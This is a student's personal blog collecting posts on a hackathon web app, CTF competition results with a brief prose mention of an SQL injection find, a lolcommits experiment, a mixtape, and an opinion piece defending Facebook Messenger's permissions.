CSESoc Hackathon

A couple of weeks back, the society I am a member of at Uni hosted a hackthon event, sponsered by Freelancer. For the uninitiated, a hackathon is an event where programmers literally turn pizza and drink into applications/code. (But in all seriousness, it’s an event where programmers develop a cool idea in a small timeframe and compete to be the ‘best’ product).

I formed a team with 2 friends from Uni. We set out to build a web platform for students of UNSW to list projects they have worked on in an easy to use web directory that they could use for employment and their own portfolio.

The webapp is written in Python/Python-Flask, uses MySQL as the backend (because mongo hates many to many relationships), and use Bootstrap to style the frontend, statically served from the server.

We wanted the following features from the service:

  • A project has:
    • Web URL
    • Download URL
    • Marketing URL
    • Markdown formatted description
    • Ability to upload screenshots of the project
    • A project can have multiple contributors
  • Project Page:
    • Showcase of all projects the user has worked on
    • About me for the user
    • Show who the user follows
    • Show who is following the user
  • Home Page/General:
    • A-Z listing of all projects
    • Show latest 3 projects on the home page “ShowCase”
  • Logins use UNSW’s LDAP service, so it’s all UNSW SSO.

There are some additional features we wish to work into it, such as reading README.md from github projects.

There are a few bugs hanging around still, along with some non-implemented features, such as multi contributors for a project. We’ll eventually get around to these, and finally launch it!

We plan to put it up on http://showc.se/, a domain I purchased for the project. It’s a nice play on words, and also is a valid regular expression, which matches “ShowCase”, but also is a play on CSE - Computer Science and Engineering.

It’s probably important to note that we came first in the Hackathon, each of the team members winning a UE Boom portable bluetooth speaker thanks to Freelancer!

Stick around for more, i’ll update this post when it’s live!

CTF Season

It’s currently CTF season, and as a member of UNSW’s security society, that means I get to play!

We began the season with CSAW CTF, where we (team K17) placed 1st in Australia/10th overall.

I did not participate in this CTF as much as I would have liked to, since I was already pre-occupied with the CSESoc Hackathon, however, I did lend a hand with Web 500 - A fake dating website where the aim was to recover Donald Trump’s TOTP key as well as his password. I managed to solve half of the challenge by finding an SQL injectable endpoint in a CSP reporting endpoint, where I dumped a password hash and other info about the account. We recovered the password hash using a dictionary attack, However the full solution required dumping of source code to determine how the TOTP key was generated, which another member of the team did, and thus solved the challenge.

The following weekend, Trend Micro CTF was running, which K17 also played in. We ended up coming in at 1st place globally out of 359 teams - A fantastic effort. Once again, I only participated lightly in this CTF. I worked on an Android APK reversing challenge, which I solved over the space of 2 hours. I will post a write up of this challenge soon!

Additionally, I was selected to play in CySCA (Australia’s Cyber Security Challenge) for UNSW3. UNSW entered 5 teams. My team (of 4) placed 3rd overall in the competition, but the entire UNSW effort was also amazing:

  • 1st: UNSW1
  • 2nd: UNSW2
  • 3rd: UNSW3
  • 4th: UNSW4
  • 29th: UNSW5

I’ll be posting my write ups over the next few weeks, explaining my solutions to the problems that I solved for these CTF’s!


It’s been a while since I last wrote a blog post, I’ve been busy working, writing code, and doing general work for university.

I’ve been scheduled to do a talk for UNSW’s CSESoc about git, which has given me great motivation to go and find cool and awesome things to do with git. I found Lolcommits! See the left hand menu of this page (on desktop only), you can see my latest commit message (and a funny photo, hopefully) for projects I have enabled lolcommits on.

My idea stemmed from me joking about how it would be funny if it automatically uploaded the image to my blog, but slowly evolved into actually becoming a thing.

All that’s left now to do is for the latest image to be automatically uploaded after it is created!

September 2014 Mixtape

A musical adventure through progressive house, deep house, dance and indie dance.

Download Here (Right click, save link/target as)

Why the Media Sucks (Facebook Messenger Isn’t Bad)

If you haven’t heard about latest news and debate surrounding Facebook’s Messenger app, I would honestly be surprised. In a brief rundown, many news agencies are giving Facebook Messenger a really, really bad rap, and in my opinion, it’s extremely unfair.

Some of the claims news agencies are making

  • It requires access to your front and back camera, this means it’s spying on us
  • It requires access to your text messages and phone calls so they must be seeing who we talk to.
  • It requires access to your contacts and are collecting all of their info.

These claims are indeed partially true – (the required permissions at least)

Sandboxing on iOS

I’m an iOS developer, and have been for many years. Within the iOS platform, apps are contained within their own sandbox, and cannot communicate with other apps (except apps owned by the same organisation, although this is still limited). More importantly, when requiring special permissions, such as camera access and contact access, they are required to show a dialogue to the user. This is the flow of iOS.

Facebook does in fact require access to your front and back camera. This isn’t to spy on you. This is to take photos for you to send to your friends via messenger. The facebook app cannot invoke the camera without the app being in the foreground (due to the nature of the sandbox and lockdownd/fairplayd (i’m pretty sure they’re the two daemons who control this) .

Facebook also requires access to your contacts. It uses this info to match them to your friends for contact synchronisation so you can get their profile pictures on your phone. Additionally this also lets you message non-facebook friends (Something new facebook is trying to make catch on like iMessage did on iOS only)

However, Facebook CANNOT under any circumstance access your phone calls or SMS messages on iOS. The iOS sandbox disallows this completely. These are no API’s for this at all.


You’re probably a little less safe on android – Facebook requires the same permissions, but also gets access to your text messages. Nothing to worry about though – Facebook doesn’t read your messages. It only checks your messages for a confirmation message it sends to confirm your phone number. There seriously is nothing here to be worried about.

The other two permissions such as camera access and contacts are also used for the above reasons, however I am not 100% sure on the android sandbox and cannot confirm whether or not they can run the camera in the background (highly unlikely they would anyway – why they hell would they want to spy on you).

Wrapping Up

Long story short, it’s some of these claims are absolutely ridiculous. More importantly, the above permissions that are required for Messenger, were part of the permissions the original Facebook app required anyway, so it’s rather a ridiculous argument for people to have.